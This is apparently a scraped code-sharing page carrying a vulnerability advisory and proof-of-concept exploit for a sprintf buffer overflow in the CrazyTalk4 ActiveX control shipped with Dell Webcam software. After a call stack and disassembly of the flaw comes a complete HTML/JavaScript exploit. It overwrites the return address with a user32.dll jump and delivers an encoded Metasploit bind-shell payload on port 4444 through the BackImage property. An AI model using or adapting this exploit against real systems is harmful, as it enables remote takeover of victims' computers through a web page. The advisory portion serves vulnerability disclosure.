扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 |
Dell Webcam Software Bundled ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Vulnerability Tested against: Microsoft Windows Vista SP2 Microsoft Windows XP SP3 Microsoft Windows 2003 R2 SP2 Internet Explorer 7/8/9 download url of a test version: http://search.dell.com/results.aspx?c=us&l=en&s=gen&cat=sup&k=Dell+SX2210+monitor&rpp=12&p=1&subcat=dyd&rf=all&nk=f&sort=K&ira=False&~srd=False&ipsys=False&advsrch=False&~ck=anav file tested: Dell_SX2210-Monitor_Webcam SW RC1.1_ R230103.exe This package contains the Dell Webcam Central software developed by Creative Technologies for Dell. info: http://dell-webcam-central.software.informer.com/ http://live-cam-avatar-creator.software.informer.com/ http://www.google.com/search?channel=s&hl=en&biw=1024&bih=581&q=13149882-F480-4F6B-8C6A-0764F75B99ED http://www.google.com/search?sclient=psy-ab&hl=en&biw=1024&bih=581&source=hp&q=crazytalk4.ocx&btnG=Search http://www.google.com/search?sclient=psy-ab&hl=en&biw=1024&bih=581&source=hp&q=CrazyTalk4Native.dll&btnG=Search http://dell-webcam-central.software.informer.com/users/ http://live-cam-avatar-creator.software.informer.com/users/ I think this is a very common ActiveX, probably bundled with Dell Notebooks. Background: The mentioned software carries a third party ActiveX Control with the following settings. Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1 CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED} Safe for Scripting (Registry): True Safe for Initialization (Registry): True This control is marked safe for scripting and safe for initialization, then Internet Explorer will allow scripting of this control from remote. Vulnerability: The 'BackImage' ,'ScriptName', 'ModelName' and 'SRC' properties can be used to trigger a buffer overflow condition. The crazytalk4.ocx ActiveX control will load the close CrazyTalk4Native.dll library and, while constructing a local file path, will call sprintf() with an insufficient size. Call stack of main thread AddressStackProcedure / arguments Called from Frame 0012EE24 023D4FAB msvcrt.sprintfCrazyTal.023D4FA5 0012EE28 0012F180 s = 0012F180 0012EE2C 023F431C format = "%s%s%s" 0012EE30 042A2D6C <%s> = "C:\DOCUME~1\Admin\LOCALS~1\Temp\RLTMP\~RW463\" 0012EE34 0012EF5C <%s> = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 0012EE38 0012EE58 <%s> = "" 0012F164 023D601D CrazyTal.023D4F20 code, CrazyTalk4Native.dll : ... 023D4F80 85C0 test eax,eax 023D4F82 74 38je short CrazyTal.023D4FBC 023D4F84 8B9C24 2C030000mov ebx,dword ptr ss:[esp+32C] 023D4F8B 8D4424 1Clea eax,dword ptr ss:[esp+1C] 023D4F8F 8D8C24 20010000lea ecx,dword ptr ss:[esp+120] 023D4F96 50 push eax 023D4F97 81C6 443B0000add esi,3B44 023D4F9D 51 push ecx 023D4F9E 56 push esi 023D4F9F 68 1C433F02push CrazyTal.023F431C ; ASCII "%s%s%s" 023D4FA4 53 push ebx 023D4FA5 FF15 E4F33E02call dword ptr ds:[<&MSVCRT.sprintf>]; msvcrt.sprintf ... As attachment, proof of concept code which overwrites EIP and SEH. Note: 0:008> lm -vm CrazyTalk4Native startendmodule name 021c0000 0220b000 CrazyTalk4Native (deferred) Image path: C:\PROGRA~1\COMMON~1\REALLU~1\CTPLAY~1\CrazyTalk4Native.dll Image name: CrazyTalk4Native.dll Timestamp:Thu May 17 12:13:42 2007 (464C2AD6) CheckSum: 00048AB2 ImageSize:0004B000 File version: 4.5.815.1 Product version:4.0.0.1 File flags: 0 (Mask 3F) File OS:4 Unknown Win32 File type:2.0 Dll File date:00000000.00000000 Translations: 0409.04b0 CompanyName:C3D ProductName:CrazyTalk4 ActiveX Control Module InternalName: CrazyTalk4 OriginalFilename: CrazyTalk4.OCX ProductVersion: 4, 0, 0, 1 FileVersion:4, 5, 815, 1 PrivateBuild: 4, 5, 815, 1 SpecialBuild: 4, 5, 815, 1 FileDescription:CrazyTalk4 Native Control Module LegalCopyright: Copyright (C) 2005 LegalTrademarks:Copyright (C) 2005 Comments: Copyright (C) 2005 POC: <!-- Dell Camera Software ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Exploit bind shell, IE-NO-DEP Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1 CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED} Safe for Scripting (Registry): True Safe for Initialization (Registry): True --> <!-- saved from url=(0014)about :internet --> <html> <object classid='clsid:13149882-F480-4F6B-8C6A-0764F75B99ED' id='obj' width=100; height=100; /> </object> <script> //bad chars: //\x80,\x82-\x8c,\x8e,\x91-\x9c,\x9e-\x9f var x=""; for (i=0; i<216; i++){x = x + "A";} x = x + "\x50\x24\x40\x77";//0x77402450jmp EBP, user32.dll - change for your need for (i=0; i<140; i++){x = x + "A";} // windows/shell_bind_tcp - 696 bytes // http://www.metasploit.com // Encoder: x86/alpha_mixed // EXITFUNC=seh, LPORT=4444, RHOST= x = x + "‰åÚÐÙuô^VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLCZJKPMM8KIKOKOKOE0LKBLFDQ4LKG5GLLKCLC5CHC1JOLKPOB8LKQOGPC1JKQYLKFTLKC1JNP1IPJ9NLMTIPCDEWIQIZDMC1IRJKL4GKPTQ4FHCEKULKQOGTEQJKBFLKDLPKLKQOELC1JKESFLLKK9BLGTELE1HCFQIKE4LKPCP0LKQPDLLKD0ELNMLKQPC8QNE8LNPNDNJLPPKOHVE6PSCVE8P3FRE8D7CCGBQOQDKON0E8HKJMKLGKPPKOIFQOLIJEE6K1JMC8C2QEBJERKOHPE8N9DIKENMF7KOHVPSF3QCQCF3QSF3QSF3KON0E6E8B1QLE6F3K9M1J5BHNDDZBPIWQGKOIFCZDPPQQEKOHPBHI4NMFNM9QGKOHVQCQEKOHPBHM5QYK6QYPWKON6F0PTF4QEKON0LSE8M7CIHFD9PWKON6F5KON0CVBJCTBFCXE3BMMYM5CZF0QIGYHLK9M7CZPDMYKRP1IPL3NJKNG2FMKNG2FLLSLMCJFXNKNKNKCXBRKNH3DVKOD5G4KOHVQKQGF2F1PQPQBJEQPQPQQEPQKON0BHNMIIC5HNQCKOIFCZKOKOP7KON0LKF7KLMSHDE4KON6PRKON0BHJPMZDDQOPSKON6KOHPAA"; try{ obj.BackImage = x; }catch(e){ } </script> |
体验盒子
